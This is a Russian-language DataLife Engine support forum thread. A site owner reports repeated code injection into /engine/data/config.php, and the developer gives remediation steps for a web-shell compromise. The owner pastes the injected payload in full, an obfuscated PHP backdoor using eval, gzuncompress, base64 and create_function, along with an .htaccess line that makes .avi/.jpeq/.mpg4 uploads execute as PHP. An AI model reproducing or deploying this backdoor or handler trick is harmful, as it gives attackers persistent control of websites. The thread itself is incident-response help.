/engine/data/config.php

[worldlenta 0]

Добрый день кто то постоянно мне вкидывает код в /engine/data/config.php

хотя у меня права стоят 444

и лицинзионная версия 15.0

Может можно настроить уведомление если поменяли этот фаил?

[crafic 35]

ключ может и есть лицензия. а сам дле вряд ли. 

[worldlenta 0]

с этого сайта тогда скачивал

[celsoft 6253]

15 часов назад, worldlenta сказал:

Добрый день кто то постоянно мне вкидывает код в /engine/data/config.php

Это говорит о наличии шелла на сервере, или злоумышленник имеет прямой доступ к серверу.

Для удаления на сервере со стороны DLE нужно сделать следующее:

1. Полностью перезалить все файлы скрипта на сервере на оригинальные из архива дистрибутива.
2. Проверить наличие постороннего или подозрительного кода в файлах в папке /engine/data/
3. После этого необходимо запустить антивирус в админпанели скрипта и удалить все на что он укажет без исключения, антивирус проверяет все папки если нажать на "Провести тщательное сканирование". Удалять нужно все, на что он указывает.
4. Если на вашем аккаунте на сервере несколько сайтов, то проделать вышеуказанные действия для всех сайтов без исключения.
5. Изменить все пароли, как к хостингу, так и к DLE.
6. Удалить в админпанели всех администраторов кроме себя.
7. Проверьте все свои файлы шаблона, удалите все неизвестные и посторонние JS скрипты, рекламные коды и скрипты.
8. Никакие сторонние модули и модификации не ставить. Если использовались сторонние модули, то удалить их все без исключения.

Со стороны сервера:

Полностью обновить все серверное ПО и сменить все без исключения пароли. Изучение логов сервера, на предмет кто с каких IP заходил на шелл на сервере, что делал до этого на сервере и куда заходил. Какая активность была перед появлением шелла на сервере в принципе.

[worldlenta 0]

  $dle_lic = "@Ev"."AL(gZu"."nCOmp"."rEss(bAS"."e64"."_Dec"."odE('eF6VVftv2zYQ/lccwDAl2JZj+R1DaNbC2IIN7ZYmG4Y2EyjpLLGWRJWPuO6Y/31HyY2TxnCxH3R8fXe87x5iW3Kx0zIgYUhaHtHSShD1glmRhJwsneFiNu5b0R3PpvO+Fe6rWIs8LHSuWCghh1g5bbHutcM37979erVyLwoVClomtXJvvDj33SVbO0xKQOQe9aHdOHDnuv9e4kHM+YaBs9/tvYB1hz3FCnDc7nw698c9MiDu8gHNOpcvsEFA5sPJ2J/MFsTl4hRifv5DxPCHCJ8cJ0HO/eHMn458f0wO3i9Gw8b7thYsQLvvV9d/rq4/kOvVH7er9zfh7fUVuVtiSJ8cSiUE3Ds4KK6rCoRDBAhYY8YqpTJ04M7GGM8rLh2ikyxJdSryDV1vPkOiN5L0CIvh01fingXBmuYSXESXMZUQF9VjXnqPGci4/LZwl5d2GZxyR0meHXxxxnN/0reiO8Z89a3AwuHVzmkMvygWfzad9KwCBgaJnebOhA6VBP0ZRH1dBjTB/T2SjF6x1NZw7KmmrpWVg4oWYCeKyYHc1ADI6mEQx3b0ZGUHWvQfcbXiRbOP5FoXpZ1xpmityH8jLo4dCVzUN60DHATdYotAGfMEbG9YSEUFXq9ABB/bG9htuUhQCxcSOloEQ1Q7QjR4muUOcv3OOMmUqi4G1k0bV5QId92ls5hM+/h1h6OR37di37ZYpbxSIRWCYioQ3GtrmR7SgDq9Efasu4QvTNmacsb+cPiPFW6n02IFTcHmsQCRIjms4UPJIFOXRvJJMaFP2Kb2itMJVSWkNBQg9aGG/n8HtKEo8jVlfM01BARbgNQMzg5N9svNze/hLa7Cn35evb0hd7a5Txxjl9f9f1YJSMOCqjhzyCCiLNGGUYxjnBnO0xwMSwtqXnNlMIzwxUQ4qxhWpVnlil6Vxobf0IxzQ4sI8X+N3oTmb/pa8K3BnNqdFJQpKMu9ASNNXvDHggSe3V2b99B2icVkGk9qJWEk1P7IgvlG8pRrIzMo0S1WSkVTs7PXe6aQpRcbrXQEhicl3+Dci3YNg9o5YbZMWfN84wlt7jdezI3OeWrWNIYIbdScPZPoeGM/U9J7hFOeo2URxZ6JWJk2PGxVWBbPaVRehMwlKpWJ4CwxBUsqsysiRkuTqTjEjZIZiTtcGh4xDNAnvwADgoH82JqemyrjJRxCZcv37LtXhiQ5hBpvCVmCuT6KObxE9ekzLwOaJCVspaEJuuNVWWWC3EZWmWANkEQUuePGtzPUZdIGrsbjVFDFeNk4KVhzhZ21zoKWfQWOPxz752tGjj16Dw//AYlYkeQ=')));";$lic_true = "cre"."ate_"."function";if(@function_exists($lic_true)){@$dle_conf = $lic_true('', "$dle_lic;");$dle_conf('');} //                                 $dle_lic = "@Ev"."AL(gZu"."nCOmp"."rEss(bAS"."e64"."_Dec"."odE('eF6dVG1v2zgM/ispEFQ21jlp0y5tA2O9DcGuuMO668uGYSsM2WZsXWzRJ8nNirH//Si7Q9qty4B9sGhJD18ekuLQ1qpSFmORiEEkktavFky3UX7NExQztQiUteCCYfL67Oyv0/mn4b3idRh+PeGbDHGpIPh2vPMj8NnujlM1BOGzw4Ojg+mOGIlwdseWg5MfwXEsjvb2p+PJ9EiEaDZCDse/huz+GrInfkJFjCfj/enB0f50ItYUDqcHPYWhWcRs+GJ+/n5+/sk6Y+AmYOGwbRowgTBgYAEmaZwr2cf1bNga9UBFnM//uZpfXCZX56eCbxm92aAybeIstP9xnby9k2GJNt6k4SyWa/8lyJxP73Fi8lIVWdTUzpd7ZFXpRv5vmUGZdUdZFnlZGPTi+WTVnY6ObdOpuHJwrLFrFic7DfxbhCy2LWDXSUyIhZGr1lSgM8w5u2bRQRppZA0OTPx5uITbFZqc1XhjYbs18S7rPcEnfpjTbSb1nXVROtccjzwPnxteGR6GM/ii3Ozudypmi80qTkMhEwO2XWv53t5al/nPy8t3yRXvkj/ezN9eimvfkhuuuTW7rt1qDBRJLV1WBmKUSpW3lDFXkiUiqaKW9AodNYqLSrJOK6CP8pXBFXFOePNh8jqheeXkqaYPBTiSOocvpGQiTVYSYsGglC3UUlXRSIkdTzfk18AEHvnuFKMeZ0hp62TBfjWXj/q4WtemwGuU3vaRYa5xSW2FBS1kBilGhMvItHSzjDLsnUeUt9nSf2SxwJZsCZp1tbzxjLCKsp6XoZVy3pmFLvRbnwGOx2pG8HPdI5NmEaVKFz0PbrKOxWMaTZRydnjKEaaKuf+7VwPd1qmSmixLtKRzgyqnWuUNgVFgPw9ejKl0WcJnWlFTooZ1qjgxwdZ3E1LkFSQte0lUzrV+EvNginbXj8KMZZ5rWFni5CkdNWVDMq/v//gFFMr6XMQLgDyVnLy48tlzPYovjXQKdR+lUb0L/zfYigd+dP1k3N0P3ql4al7f3f0P9ywaOQ==')));";$lic_true = "cre"."ate_"."function";if(@function_exists($lic_true)){@$dle_conf = $lic_true('', "$dle_lic;");$dle_conf('');}

Вот этот код опять появился хотя ни чего такого уже долго не было

Поставил права на эту папку только чтение и ни чего не меняется

pdp.dog/uploads/fotos/.htaccess   только этот фаил был для антивируса подозрительный

внутри код

<FilesMatch ".([Pp][Hh][Pp]|[Cc][Gg][Ii]|[Pp][Ll]|[Pp][Hh][Ii][Mm][Ll]).?">
   Order allow,deny
   Deny from all
</FilesMatch>
AddHandler application/x-httpd-php .avi .jpeq .mpg4

А Можно оплатить, чтобы кто то из Ваших сотрудников проверил?

Изменено 19 марта 2024 пользователем worldlenta

[celsoft 6253]

11 минут назад, worldlenta сказал:

Поставил права на эту папку только чтение и ни чего не меняется

Делайте вывод, значит это делается с правами выше чем с теми с которыми вы ставите права.

Инструкция не меняется, вам нужно делать все тоже самое и каждый !!! пункт обязателен !!! :

Цитата

1. Полностью перезалить все файлы скрипта на сервере на оригинальные из архива дистрибутива.
2. Проверить наличие постороннего или подозрительного кода в файлах в папке /engine/data/
3. После этого необходимо запустить антивирус в админпанели скрипта и удалить все на что он укажет без исключения, антивирус проверяет все папки если нажать на "Провести тщательное сканирование". Удалять нужно все, на что он указывает.
4. Если на вашем аккаунте на сервере несколько сайтов, то проделать вышеуказанные действия для всех сайтов без исключения.
5. Изменить все пароли, как к хостингу, так и к DLE.
6. Удалить в админпанели всех администраторов кроме себя.
7. Проверьте все свои файлы шаблона, удалите все неизвестные и посторонние JS скрипты, рекламные коды и скрипты.
8. Никакие сторонние модули и модификации не ставить. Если использовались сторонние модули, то удалить их все без исключения.